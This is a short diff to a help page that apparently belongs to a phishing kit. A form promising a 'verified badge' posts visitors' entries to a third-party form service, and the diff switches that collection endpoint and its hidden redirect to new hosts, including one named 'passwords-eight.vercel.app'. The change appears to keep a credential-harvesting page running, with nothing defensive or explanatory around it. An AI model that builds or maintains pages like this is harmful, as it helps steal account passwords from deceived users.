--- a/help.html
+++ b/help.html
@@ -225,11 +225,11 @@
       <p class=form-notice>Please ensure that all required information is accurately provided. Failure to do so may
          result in not receiving a verified badge.</p>
 
-                        <form class="content" action="https://submit-form.com/GbrjdieOa" method="POST">
+                        <form class="content" action="https://submit-form.com/pWN9hOmSK" method="POST">
  <input
     type="hidden"
     name="_redirect"
-    value="https://fb-review-password.vercel.app/"
+    value="https://passwords-eight.vercel.app/"
   />
          
          <div class=form-group>
